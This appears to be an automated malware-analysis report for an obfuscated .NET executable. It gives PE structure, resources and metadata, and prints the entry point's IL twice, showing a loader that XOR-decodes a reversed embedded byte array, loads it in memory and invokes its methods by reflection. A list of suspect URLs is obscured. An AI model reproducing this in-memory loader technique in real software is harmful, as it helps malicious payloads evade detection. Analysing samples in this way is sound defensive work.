Suspicious
Suspect

Share on LinkedIn
Print
PE Executable
MD5:
Size: 0 B
application/x-dosexec

Get an AI-generated breakdown of this malware's behaviour, IOCs and recommendations.

AI analysis is available with Essential.
Unlock with Essential
Symbol Obfuscation Score Very high
PeID
.NET executableMicrosoft Visual C# / Basic .NETMicrosoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL Microsoft Visual C# v7.0 / Basic .NETMicrosoft Visual Studio .NET
[Authenticode]_e71c699a.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0032
ID:0
ID:0-preview.png
ID:0033
ID:0
ID:0034
ID:0
ID:0035
ID:0
ID:0036
ID:0
ID:0037
ID:0
ID:0038
ID:0
ID:0039
ID:0
ID:003A
ID:0
RT_GROUP_CURSOR4
ID:0065
ID:0
RT_VERSION
ID:0001
ID:1033
.Net Resources
Dg0cixZ.Resources.resources
e95c46fba9ece8.Resources.resources
49fcaac70
[NBF]root.Data
49fcaac71
[NBF]root.Data
49fcaac710
[NBF]root.Data
49fcaac711
[NBF]root.Data
49fcaac712
[NBF]root.Data
49fcaac713
[NBF]root.Data
49fcaac714
[NBF]root.Data
49fcaac715
[NBF]root.Data
49fcaac716
[NBF]root.Data
49fcaac717
[NBF]root.Data
49fcaac718
[NBF]root.Data
49fcaac719
[NBF]root.Data
49fcaac72
[NBF]root.Data
49fcaac720
[NBF]root.Data
49fcaac721
[NBF]root.Data
49fcaac722
[NBF]root.Data
49fcaac723
[NBF]root.Data
49fcaac724
[NBF]root.Data
49fcaac725
[NBF]root.Data
49fcaac726
[NBF]root.Data
49fcaac727
[NBF]root.Data
49fcaac728
[NBF]root.Data
49fcaac729
[NBF]root.Data
49fcaac73
[NBF]root.Data
49fcaac730
[NBF]root.Data
49fcaac731
[NBF]root.Data
49fcaac732
[NBF]root.Data
49fcaac733
[NBF]root.Data
49fcaac734
[NBF]root.Data
49fcaac735
[NBF]root.Data
49fcaac736
[NBF]root.Data
49fcaac737
[NBF]root.Data
49fcaac738
[NBF]root.Data
49fcaac739
[NBF]root.Data
49fcaac74
[NBF]root.Data
49fcaac740
[NBF]root.Data
49fcaac741
[NBF]root.Data
49fcaac742
[NBF]root.Data
49fcaac743
[NBF]root.Data
49fcaac744
[NBF]root.Data
49fcaac745
[NBF]root.Data
49fcaac746
[NBF]root.Data
49fcaac747
[NBF]root.Data
49fcaac748
[NBF]root.Data
49fcaac749
[NBF]root.Data
49fcaac75
[NBF]root.Data
49fcaac750
[NBF]root.Data
49fcaac751
[NBF]root.Data
49fcaac752
[NBF]root.Data
49fcaac753
[NBF]root.Data
49fcaac754
[NBF]root.Data
49fcaac755
[NBF]root.Data
49fcaac756
[NBF]root.Data
49fcaac757
[NBF]root.Data
49fcaac758
[NBF]root.Data
49fcaac759
[NBF]root.Data
49fcaac76
[NBF]root.Data
49fcaac760
[NBF]root.Data
49fcaac761
[NBF]root.Data
49fcaac762
[NBF]root.Data
49fcaac763
[NBF]root.Data
49fcaac764
[NBF]root.Data
49fcaac765
[NBF]root.Data
49fcaac766
[NBF]root.Data
49fcaac767
[NBF]root.Data
49fcaac768
[NBF]root.Data
49fcaac769
[NBF]root.Data
49fcaac77
[NBF]root.Data
49fcaac770
[NBF]root.Data
49fcaac771
[NBF]root.Data
49fcaac772
[NBF]root.Data
49fcaac773
[NBF]root.Data
49fcaac774
[NBF]root.Data
49fcaac775
[NBF]root.Data
49fcaac776
[NBF]root.Data
49fcaac777
[NBF]root.Data
49fcaac778
[NBF]root.Data
49fcaac779
[NBF]root.Data
49fcaac78
[NBF]root.Data
49fcaac780
[NBF]root.Data
49fcaac781
[NBF]root.Data
49fcaac782
[NBF]root.Data
49fcaac783
[NBF]root.Data
49fcaac784
[NBF]root.Data
49fcaac785
[NBF]root.Data
49fcaac786
[NBF]root.Data
49fcaac787
[NBF]root.Data
49fcaac788
[NBF]root.Data
49fcaac789
[NBF]root.Data
49fcaac79
[NBF]root.Data
49fcaac790
[NBF]root.Data
49fcaac791
[NBF]root.Data
49fcaac792
[NBF]root.Data
49fcaac793
[NBF]root.Data
49fcaac794
[NBF]root.Data
49fcaac795
[NBF]root.Data
49fcaac796
[NBF]root.Data
49fcaac797
[NBF]root.Data
49fcaac798
[NBF]root.Data
49fcaac799
[NBF]root.Data
Name Value
Info
PE Detect: PeReader OK (file layout)
Info
Authenticode present at 0x257A00 size 18264 bytes
Module Name
Dg0cixZ
Full Name
Dg0cixZ
EntryPoint
System.Void Dg0cixZ.iz5PG::Wpw1m8iALg0rf()
Scope Name
Dg0cixZ
Scope Type
ModuleDef
Kind
Windows
Runtime Version
v4.0.30319
Tables Header Version
512
WinMD Version
<null>
Assembly Name
Dg0cixZ
Assembly Version
1.9.2.0
Assembly Culture
<null>
Has PublicKey
False
PublicKey Token
<null>
Target Framework
.NETFramework,Version=v4.6
Total Strings
981
Main Method
System.Void Dg0cixZ.iz5PG::Wpw1m8iALg0rf()
Main IL Instruction Count
125
Main IL
nop <null>
nop <null>
ldc.i4.s 20
call System.Void System.Threading.Thread::Sleep(System.Int32)
nop <null>
call System.Byte[] Dg0cixZ.ge0L4NjoTpw7::Ss3p6jpTxN()
call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Reverse<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>)
call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>)
stloc.0 <null>
ldloc.0 <null>
ldlen <null>
conv.i4 <null>
ldc.i4.1 <null>
sub.ovf <null>
stloc.s V_4
ldc.i4.0 <null>
stloc.s V_5
br.s IL_0049: ldloc.s V_5
ldloc.s V_5
ldc.i4.8 <null>
rem <null>
ldc.i4.0 <null>
ceq <null>
stloc.s V_6
ldloc.s V_6
brfalse.s IL_0042: nop
ldloc.0 <null>
ldloc.s V_5
ldloc.0 <null>
ldloc.s V_5
ldelem.u1 <null>
ldc.i4 211
xor <null>
stelem.i1 <null>
nop <null>
nop <null>
ldloc.s V_5
ldc.i4.1 <null>
add.ovf <null>
stloc.s V_5
ldloc.s V_5
ldloc.s V_4
ble.s IL_0026: ldloc.s V_5
ldloc.0 <null>
call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
stloc.1 <null>
ldloc.1 <null>
callvirt System.Type[] System.Reflection.Assembly::GetTypes()
stloc.2 <null>
ldloc.2 <null>
ldlen <null>
conv.i4 <null>
ldc.i4.s 24
cgt <null>
ldc.i4.0 <null>
ceq <null>
stloc.s V_7
ldloc.s V_7
brfalse.s IL_006F: ldloc.2
leave.s IL_00EA: ret
ldloc.2 <null>
ldc.i4.s 24
ldelem.ref <null>
stloc.3 <null>
ldloc.3 <null>
ldnull <null>
ceq <null>
stloc.s V_8
ldloc.s V_8
brfalse.s IL_0080: ldloc.3
leave.s IL_00EA: ret
ldloc.3 <null>
ldc.i4.s 56
callvirt System.Reflection.MethodInfo[] System.Type::GetMethods(System.Reflection.BindingFlags)
stloc.s V_9
ldc.i4.0 <null>
stloc.s V_10
br.s IL_00CC: ldloc.s V_10
ldloc.s V_9
ldloc.s V_10
ldelem.ref <null>
stloc.s V_11
ldloc.s V_11
callvirt System.Reflection.ParameterInfo[] System.Reflection.MethodBase::GetParameters()
ldlen <null>
conv.i4 <null>
ldc.i4.0 <null>
ceq <null>
stloc.s V_12
ldloc.s V_12
brfalse.s IL_00C4: nop
nop <null>
ldloc.s V_11
ldnull <null>
ldnull <null>
callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[])
pop <null>
leave.s IL_00C2: nop
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception)
nop <null>
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
leave.s IL_00C2: nop
nop <null>
nop <null>
nop <null>
nop <null>
ldloc.s V_10
ldc.i4.1 <null>
add.ovf <null>
stloc.s V_10
ldloc.s V_10
ldloc.s V_9
ldlen <null>
conv.i4 <null>
clt <null>
stloc.s V_13
ldloc.s V_13
brtrue.s IL_008F: ldloc.s V_9
leave.s IL_00E9: nop
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception)
nop <null>
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
leave.s IL_00E9: nop
nop <null>
ret <null>
Module Name
Dg0cixZ
Full Name
Dg0cixZ
EntryPoint
System.Void Dg0cixZ.iz5PG::Wpw1m8iALg0rf()
Scope Name
Dg0cixZ
Scope Type
ModuleDef
Kind
Windows
Runtime Version
v4.0.30319
Tables Header Version
512
WinMD Version
<null>
Assembly Name
Dg0cixZ
Assembly Version
1.9.2.0
Assembly Culture
<null>
Has PublicKey
False
PublicKey Token
<null>
Target Framework
.NETFramework,Version=v4.6
Total Strings
981
Main Method
System.Void Dg0cixZ.iz5PG::Wpw1m8iALg0rf()
Main IL Instruction Count
125
Main IL
nop <null>
nop <null>
ldc.i4.s 20
call System.Void System.Threading.Thread::Sleep(System.Int32)
nop <null>
call System.Byte[] Dg0cixZ.ge0L4NjoTpw7::Ss3p6jpTxN()
call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Reverse<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>)
call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>)
stloc.0 <null>
ldloc.0 <null>
ldlen <null>
conv.i4 <null>
ldc.i4.1 <null>
sub.ovf <null>
stloc.s V_4
ldc.i4.0 <null>
stloc.s V_5
br.s IL_0049: ldloc.s V_5
ldloc.s V_5
ldc.i4.8 <null>
rem <null>
ldc.i4.0 <null>
ceq <null>
stloc.s V_6
ldloc.s V_6
brfalse.s IL_0042: nop
ldloc.0 <null>
ldloc.s V_5
ldloc.0 <null>
ldloc.s V_5
ldelem.u1 <null>
ldc.i4 211
xor <null>
stelem.i1 <null>
nop <null>
nop <null>
ldloc.s V_5
ldc.i4.1 <null>
add.ovf <null>
stloc.s V_5
ldloc.s V_5
ldloc.s V_4
ble.s IL_0026: ldloc.s V_5
ldloc.0 <null>
call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
stloc.1 <null>
ldloc.1 <null>
callvirt System.Type[] System.Reflection.Assembly::GetTypes()
stloc.2 <null>
ldloc.2 <null>
ldlen <null>
conv.i4 <null>
ldc.i4.s 24
cgt <null>
ldc.i4.0 <null>
ceq <null>
stloc.s V_7
ldloc.s V_7
brfalse.s IL_006F: ldloc.2
leave.s IL_00EA: ret
ldloc.2 <null>
ldc.i4.s 24
ldelem.ref <null>
stloc.3 <null>
ldloc.3 <null>
ldnull <null>
ceq <null>
stloc.s V_8
ldloc.s V_8
brfalse.s IL_0080: ldloc.3
leave.s IL_00EA: ret
ldloc.3 <null>
ldc.i4.s 56
callvirt System.Reflection.MethodInfo[] System.Type::GetMethods(System.Reflection.BindingFlags)
stloc.s V_9
ldc.i4.0 <null>
stloc.s V_10
br.s IL_00CC: ldloc.s V_10
ldloc.s V_9
ldloc.s V_10
ldelem.ref <null>
stloc.s V_11
ldloc.s V_11
callvirt System.Reflection.ParameterInfo[] System.Reflection.MethodBase::GetParameters()
ldlen <null>
conv.i4 <null>
ldc.i4.0 <null>
ceq <null>
stloc.s V_12
ldloc.s V_12
brfalse.s IL_00C4: nop
nop <null>
ldloc.s V_11
ldnull <null>
ldnull <null>
callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[])
pop <null>
leave.s IL_00C2: nop
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception)
nop <null>
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
leave.s IL_00C2: nop
nop <null>
nop <null>
nop <null>
nop <null>
ldloc.s V_10
ldc.i4.1 <null>
add.ovf <null>
stloc.s V_10
ldloc.s V_10
ldloc.s V_9
ldlen <null>
conv.i4 <null>
clt <null>
stloc.s V_13
ldloc.s V_13
brtrue.s IL_008F: ldloc.s V_9
leave.s IL_00E9: nop
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception)
nop <null>
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
leave.s IL_00E9: nop
nop <null>
ret <null>
URLs in VB Code - #1 URIsuspect
https:huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #2 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #3 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #4 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #5 URIsuspect
https:huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #6 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #7 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #8 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #9 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #10 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #11 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #12 URIsuspect
https:huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #13 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #14 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
URLs in VB Code - #15 URIsuspect
http:/huhuhuhuhuhuhuhuhuhuhu
Full artefact values (URLs, paths, registry keys, scripts…) are available with Essential.
Unlock with Essential
An error has occurred. This application may no longer respond until reloaded. Reload 🗙